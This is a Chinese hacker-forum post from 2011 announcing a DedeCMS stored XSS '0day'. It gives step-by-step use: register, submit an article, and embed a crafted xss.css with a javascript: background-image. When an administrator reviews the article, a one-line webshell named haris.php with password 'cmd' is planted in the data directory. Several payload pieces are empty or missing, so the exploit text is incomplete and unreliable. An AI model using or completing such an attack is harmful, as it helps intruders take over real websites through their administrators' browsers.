蓝盟诗人[LUC]蓝客联盟

忘记密码

dedecms xss 0day通杀所有版本

2011-10-19 17:03 作者: 来源: 本站 浏览: 1,712 views 我要评论 字号:

作者:haris
漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell

为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。

下面说说利用方法。
条件有2个:
1.开启注册
2.开启投稿

注册会员—-发表文章

内容填写:

新建xss.css,内容:

[/php]
body{
background-image:url(‘javascript:document.write(““)’)
}
[/php]

新建xss.js文件,内容:

当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd

打印
分享到:
复制链接

发表评论

*

* (保密)

icon_wink.gif icon_neutral.gif icon_mad.gif icon_twisted.gif icon_smile.gif icon_eek.gif icon_sad.gif icon_rolleyes.gif icon_razz.gif icon_redface.gif icon_surprised.gif icon_mrgreen.gif icon_lol.gif icon_idea.gif icon_biggrin.gif icon_evil.gif icon_cry.gif icon_cool.gif icon_arrow.gif icon_confused.gif icon_question.gif icon_exclaim.gif

Ctrl+Enter 快捷回复

会员登录关闭

记住我 忘记密码

注册会员关闭

小提示: 您的密码会通过填写的"电子邮箱"发送给您.